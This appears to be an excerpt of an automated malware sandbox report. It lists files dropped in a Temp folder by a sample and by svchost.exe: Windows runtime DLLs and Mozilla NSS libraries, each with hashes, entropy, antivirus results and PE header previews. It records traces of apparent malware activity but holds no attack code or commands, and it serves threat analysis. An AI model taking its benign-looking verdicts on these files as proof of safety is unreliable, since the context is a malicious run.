                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-math-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):28984
                                  Entropy (8bit):6.6686462438397
                                  Encrypted:false
                                  SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                                  MD5:8B0BA750E7B15300482CE6C961A932F0
                                  SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                                  SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                                  SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-multibyte-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):26424
                                  Entropy (8bit):6.712286643697659
                                  Encrypted:false
                                  SSDEEP:384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
                                  MD5:35FC66BD813D0F126883E695664E7B83
                                  SHA1:2FD63C18CC5DC4DEFC7EA82F421050E668F68548
                                  SHA-256:66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
                                  SHA-512:65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-private-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):73016
                                  Entropy (8bit):5.838702055399663
                                  Encrypted:false
                                  SSDEEP:1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj
                                  MD5:9910A1BFDC41C5B39F6AF37F0A22AACD
                                  SHA1:47FA76778556F34A5E7910C816C78835109E4050
                                  SHA-256:65DED8D2CE159B2F5569F55B2CAF0E2C90F3694BD88C89DE790A15A49D8386B9
                                  SHA-512:A9788D0F8B3F61235EF4740724B4A0D8C0D3CF51F851C367CC9779AB07F208864A7F1B4A44255E0DE8E030D84B63B1BDB58F12C8C20455FF6A55EF6207B31A91
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....^1...........!................................................................R.....@.............................................................8=..............T............................................................................text............................... ..`.rsrc...............................@..@v.....................^1........:...d...d.........^1........d.................^1....................RSDS.J..w/.8..bu..3.....api-ms-win-crt-private-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata......`....rsrc$01....`........rsrc$02......................^1.....>..............8...h#...5...>...?..7?.._?...?...?...?...@..V@...@...@...@..+A..\A...A...A...A...B..LB...B...B...C..HC...C...C...C...C...D..HD...D...D...E..eE...E...E...F..1F..gF...F...F...G..BG..uG...G..

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-process-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19256
                                  Entropy (8bit):7.076072254895036
                                  Encrypted:false
                                  SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                                  MD5:8D02DD4C29BD490E672D271700511371
                                  SHA1:F3035A756E2E963764912C6B432E74615AE07011
                                  SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                                  SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-runtime-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):22840
                                  Entropy (8bit):6.942029615075195
                                  Encrypted:false
                                  SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                                  MD5:41A348F9BEDC8681FB30FA78E45EDB24
                                  SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                                  SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                                  SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-stdio-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):24368
                                  Entropy (8bit):6.873960147000383
                                  Encrypted:false
                                  SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                                  MD5:FEFB98394CB9EF4368DA798DEAB00E21
                                  SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                                  SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                                  SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-string-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):23488
                                  Entropy (8bit):6.840671293766487
                                  Encrypted:false
                                  SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                                  MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                                  SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                                  SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                                  SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-time-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):20792
                                  Entropy (8bit):7.018061005886957
                                  Encrypted:false
                                  SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                                  MD5:849F2C3EBF1FCBA33D16153692D5810F
                                  SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                                  SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                                  SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-utility-l1-1-0.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18744
                                  Entropy (8bit):7.127951145819804
                                  Encrypted:false
                                  SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                                  MD5:B52A0CA52C9C207874639B62B6082242
                                  SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                                  SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                                  SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\freebl3.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):332752
                                  Entropy (8bit):6.8061257098244905
                                  Encrypted:false
                                  SSDEEP:6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
                                  MD5:343AA83574577727AABE537DCCFDEAFC
                                  SHA1:9CE3B9A182429C0DBA9821E2E72D3AB46F5D0A06
                                  SHA-256:393AE7F06FE6CD19EA6D57A93DD0ACD839EE39BA386CF1CA774C4C59A3BFEBD8
                                  SHA-512:827425D98BA491CD30929BEE6D658FCF537776CE96288180FE670FA6320C64177A7214FF4884AE3AA68E135070F28CA228AFB7F4012B724014BA7D106B5F0DCE
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L......Z.........."!.........f...............................................p......o.....@.............................P...`........@..p....................P..........T...........................8...@...............8............................text...U........................... ..`.rdata..............................@..@.data...lH..........................@....rsrc...p....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\mozglue.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):139216
                                  Entropy (8bit):6.841477908153926
                                  Encrypted:false
                                  SSDEEP:3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR
                                  MD5:9E682F1EB98A9D41468FC3E50F907635
                                  SHA1:85E0CECA36F657DDF6547AA0744F0855A27527EE
                                  SHA-256:830533BB569594EC2F7C07896B90225006B90A9AF108F49D6FB6BEBD02428B2D
                                  SHA-512:230230722D61AC1089FABF3F2DECFA04F9296498F8E2A2A49B1527797DCA67B5A11AB8656F04087ACADF873FA8976400D57C77C404EBA4AFF89D92B9986F32ED
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."yQ.f.?Mf.?Mf.?Mo`.Mv.?M.z>Lb.?M...Md.?M.z<Lh.?M.z;Lm.?M.z:Lu.?MDx>Lo.?Mf.>M..?M.{1Lu.?M.{?Lg.?M.{.Mg.?M.{=Lg.?MRichf.?M................PE..L......Z.........."!.........................................................@............@.............................\...L...,.... ..p....................0......p...T...............................@...................T...@....................text............................... ..`.rdata...b.......d..................@..@.data...............................@....rsrc...p.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\msvcp140.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):440120
                                  Entropy (8bit):6.652844702578311
                                  Encrypted:false
                                  SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                  MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                  SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                  SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                  SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\nss3.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):1244112
                                  Entropy (8bit):6.809431682312062
                                  Encrypted:false
                                  SSDEEP:24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
                                  MD5:556EA09421A0F74D31C4C0A89A70DC23
                                  SHA1:F739BA9B548EE64B13EB434A3130406D23F836E3
                                  SHA-256:F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
                                  SHA-512:2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b*..c+lh.+..c++.`*..c++.f*..c++.g*..c+.b*..c+9.b*..c+..b+..c+9.k*..c+9.g*C.c+9.c*..c+9..+..c+9.a*..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\nssdbm3.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):92624
                                  Entropy (8bit):6.639368309935547
                                  Encrypted:false
                                  SSDEEP:1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
                                  MD5:569A7A65658A46F9412BDFA04F86E2B2
                                  SHA1:44CC0038E891AE73C43B61A71A46C97F98B1030D
                                  SHA-256:541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
                                  SHA-512:C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\softokn3.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):144336
                                  Entropy (8bit):6.5527585854849395
                                  Encrypted:false
                                  SSDEEP:3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
                                  MD5:67827DB2380B5848166A411BAE9F0632
                                  SHA1:F68F1096C5A3F7B90824AA0F7B9DA372228363FF
                                  SHA-256:9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
                                  SHA-512:910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\ucrtbase.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):1142072
                                  Entropy (8bit):6.809041027525523
                                  Encrypted:false
                                  SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                  MD5:D6326267AE77655F312D2287903DB4D3
                                  SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                  SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                  SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\CFBCB28B\vcruntime140.dll

                                  Download File
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):83784
                                  Entropy (8bit):6.890347360270656
                                  Encrypted:false
                                  SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                  MD5:7587BF9CB4147022CD5681B015183046
                                  SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                  SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                  SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\Clinton

                                  Download File
                                  Process:C:\Users\user\Desktop\cJX8BV8LYG.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):114688
                                  Entropy (8bit):7.40937610968776
                                  Encrypted:false
                                  SSDEEP:3072:BqV9Qtmg9VPizP2OU3mVJ8ohgP2pysZbJmb1+TH:KQt/9VPOaW9hxVZFZT
                                  MD5:7294294A8424517CF22221ED3079D34F
                                  SHA1:2E9DBC5F476E47C559426076AFD226B3887D48A0
                                  SHA-256:6374621B5E383341BFCD9F96584C60A7FDB53EE6E39CA1A85D45C6FD4E20499F
                                  SHA-512:93699FB9AF82A8EB4D351D7D3B2808F0DC10A3CF4708614CA6F9B1C4AC7A4615869D8EC84F5051740DE9C047F4D85E791D5B7E248ADB9A1A6B10A77FCB3E1A97
                                  Malicious:false
